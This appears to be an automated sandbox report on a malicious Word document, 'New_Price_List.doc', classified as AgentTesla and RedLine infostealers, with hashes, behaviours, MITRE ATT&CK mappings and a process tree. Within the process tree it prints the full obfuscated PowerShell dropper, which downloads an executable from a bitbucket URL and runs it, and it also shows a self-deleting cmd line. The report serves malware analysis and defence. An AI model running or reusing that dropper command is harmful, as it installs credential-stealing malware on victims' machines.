agenttesla | 86131b3185958bd9ece75c484ff8ababf6048b67f3c988d01eb3b9fd3bd1f959

General

Target

New_Price_List.doc
Size

22KB
MD5

55270b0cc9a3fda4609e29c4e1cda566
SHA1

edeffab799a9ac347724e5f6a7aecaa087b452c6
SHA256

86131b3185958bd9ece75c484ff8ababf6048b67f3c988d01eb3b9fd3bd1f959
SHA512

2cf4b8955af2e7415bd40e6c629e4cc18797d3c410e7f741ed94952cd72bc04913f3818071efd7ee4822263802754e034dbe2a4f9d2c7f612727ffe03a4e3d58

Score

10^/10

agenttesla redline infostealer keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/cryptexxx/files/downloads/Gilbert.exe

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1920	3328	powershell.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

AgentTesla Payload 2 IoCs

keylogger stealer

Processes:

resource	yara_rule
behavioral1/memory/1712-24-0x0000000002F20000-0x0000000002F43000-memory.dmp	agent_tesla
behavioral1/memory/1712-26-0x0000000002FD0000-0x0000000002FF2000-memory.dmp	agent_tesla

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

23 1920 powershell.exe
25 1920 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

hmpkjcvy.exe

pid process

4016 hmpkjcvy.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

38 checkip.amazonaws.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

hmpkjcvy.exe

description pid process target process

PID 4016 set thread context of 1712 4016 hmpkjcvy.exe AddInProcess32.exe

flow	pid	process
23	1920	powershell.exe
25	1920	powershell.exe

pid	process
4016	hmpkjcvy.exe

flow	ioc
38	checkip.amazonaws.com

description	pid	process	target process
PID 4016 set thread context of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

812 PING.EXE
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

492 WINWORD.EXE
492 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exeAddInProcess32.exe

pid process

1920 powershell.exe
1920 powershell.exe
1920 powershell.exe
1712 AddInProcess32.exe
1712 AddInProcess32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

WINWORD.EXE

pid process

492 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exehmpkjcvy.exeAddInProcess32.exe

description pid process

Token: SeDebugPrivilege 1920 powershell.exe
Token: SeDebugPrivilege 4016 hmpkjcvy.exe
Token: SeDebugPrivilege 1712 AddInProcess32.exe

pid	process
812	PING.EXE

pid	process
1920	powershell.exe
1920	powershell.exe
1920	powershell.exe
1712	AddInProcess32.exe
1712	AddInProcess32.exe

description	pid	process
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	4016	hmpkjcvy.exe
Token: SeDebugPrivilege	1712	AddInProcess32.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

WINWORD.EXE

pid	process
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE
492	WINWORD.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

powershell.exehmpkjcvy.exeAddInProcess32.execmd.exe

description	pid	process	target process
PID 1920 wrote to memory of 4016	1920	powershell.exe	hmpkjcvy.exe
PID 1920 wrote to memory of 4016	1920	powershell.exe	hmpkjcvy.exe
PID 1920 wrote to memory of 4016	1920	powershell.exe	hmpkjcvy.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 4016 wrote to memory of 1712	4016	hmpkjcvy.exe	AddInProcess32.exe
PID 1712 wrote to memory of 3612	1712	AddInProcess32.exe	cmd.exe
PID 1712 wrote to memory of 3612	1712	AddInProcess32.exe	cmd.exe
PID 1712 wrote to memory of 3612	1712	AddInProcess32.exe	cmd.exe
PID 3612 wrote to memory of 812	3612	cmd.exe	PING.EXE
PID 3612 wrote to memory of 812	3612	cmd.exe	PING.EXE
PID 3612 wrote to memory of 812	3612	cmd.exe	PING.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\New_Price_List.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe INvOkE-EXpRessiOn((('t9Qclien'+'t '+'= new'+'-'+'object S'+'ys'+'tem.Net.'+'WebClient'+';t9Qa'+' = AEi'+'https://bitbucket.org/cryptexxx/files/downloads/Gilbert.exe'+'AEi.Spl'+'i'+'t'+'('+'AEi'+','+'AEi);t9Qhu'+'as = '+'t'+'9Q'+'env:temp'+' + AEi'+'c4g'+'hmpkjcvy.exe'+'AEi;for'+'each'+'(t9'+'Q'+'b'+' in t9Qa)'+'{try{t9Qclie'+'nt'+'.DownloadFil'+'e(t9Qb.ToS'+'t'+'ring()'+','+' '+'t9Qhuas);I'+'nvoke-Item(t9Qhua'+'s);'+'b'+'reak;}catch{'+'write-hos'+'t t'+'9Q'+'_.Exce'+'ption.Me'+'ssa'+'ge'+'}};') -rePlacE't9Q',[ChAr]36 -crEPLacE'c4g',[ChAr]92 -crEPLacE'AEi',[ChAr]39) )
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920

C:\Users\Admin\AppData\Local\Temp\hmpkjcvy.exe
"C:\Users\Admin\AppData\Local\Temp\hmpkjcvy.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.1 -n 3 > nul & del ""
4⤵
- Suspicious use of WriteProcessMemory
PID:3612

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
5⤵
- Runs ping.exe
PID:812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

2

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hmpkjcvy.exe

MD5
b910d098d644bee45252c629331ccae0

SHA1
3a86437e237d1be4e614a9358df17ddc259ff4e0

SHA256
ff7bf97b76ceb52b9a866f82b3b57be94381ac907e1e9689516038f79ea93e95

SHA512
bfc526db127d7c7643307b39f085b1de17450a0ed340556cb38ac4812484600093687743e7e958cc97f28652682d59f8c9ce92970d2f9a6270f32911a87d4d03

Download Submit
C:\Users\Admin\AppData\Local\Temp\hmpkjcvy.exe

MD5
b910d098d644bee45252c629331ccae0

SHA1
3a86437e237d1be4e614a9358df17ddc259ff4e0

SHA256
ff7bf97b76ceb52b9a866f82b3b57be94381ac907e1e9689516038f79ea93e95

SHA512
bfc526db127d7c7643307b39f085b1de17450a0ed340556cb38ac4812484600093687743e7e958cc97f28652682d59f8c9ce92970d2f9a6270f32911a87d4d03

Download Submit
memory/492-0-0x00000211416D0000-0x0000021141D07000-memory.dmp

Filesize
6.2MB

Download
memory/812-41-0x0000000000000000-mapping.dmp

Download
memory/1712-34-0x0000000006F40000-0x0000000006F41000-memory.dmp

Filesize
4KB

Download
memory/1712-27-0x0000000006710000-0x0000000006711000-memory.dmp

Filesize
4KB

Download
memory/1712-39-0x0000000008D90000-0x0000000008D91000-memory.dmp

Filesize
4KB

Download
memory/1712-38-0x0000000007CD0000-0x0000000007CD1000-memory.dmp

Filesize
4KB

Download
memory/1712-37-0x0000000007670000-0x0000000007671000-memory.dmp

Filesize
4KB

Download
memory/1712-19-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1712-20-0x000000000040CD2F-mapping.dmp

Download
memory/1712-21-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1712-22-0x0000000002F60000-0x0000000002F61000-memory.dmp

Filesize
4KB

Download
memory/1712-23-0x0000000073520000-0x0000000073C0E000-memory.dmp

Filesize
6.9MB

Download
memory/1712-24-0x0000000002F20000-0x0000000002F43000-memory.dmp

Filesize
140KB

Download
memory/1712-25-0x0000000005C00000-0x0000000005C01000-memory.dmp

Filesize
4KB

Download
memory/1712-26-0x0000000002FD0000-0x0000000002FF2000-memory.dmp

Filesize
136KB

Download
memory/1712-36-0x0000000007240000-0x0000000007241000-memory.dmp

Filesize
4KB

Download
memory/1712-28-0x0000000005630000-0x0000000005631000-memory.dmp

Filesize
4KB

Download
memory/1712-29-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/1712-30-0x0000000005680000-0x0000000005681000-memory.dmp

Filesize
4KB

Download
memory/1712-31-0x0000000005920000-0x0000000005921000-memory.dmp

Filesize
4KB

Download
memory/1712-32-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

Filesize
4KB

Download
memory/1712-33-0x00000000076F0000-0x00000000076F1000-memory.dmp

Filesize
4KB

Download
memory/1712-35-0x00000000071C0000-0x00000000071C1000-memory.dmp

Filesize
4KB

Download
memory/1920-11-0x0000028B71650000-0x0000028B71651000-memory.dmp

Filesize
4KB

Download
memory/1920-12-0x0000028B71CE0000-0x0000028B71CE1000-memory.dmp

Filesize
4KB

Download
memory/1920-10-0x00007FF99C290000-0x00007FF99CC7C000-memory.dmp

Filesize
9.9MB

Download
memory/3612-40-0x0000000000000000-mapping.dmp

Download
memory/4016-13-0x0000000000000000-mapping.dmp

Download
memory/4016-17-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

Filesize
4KB

Download
memory/4016-16-0x0000000073520000-0x0000000073C0E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads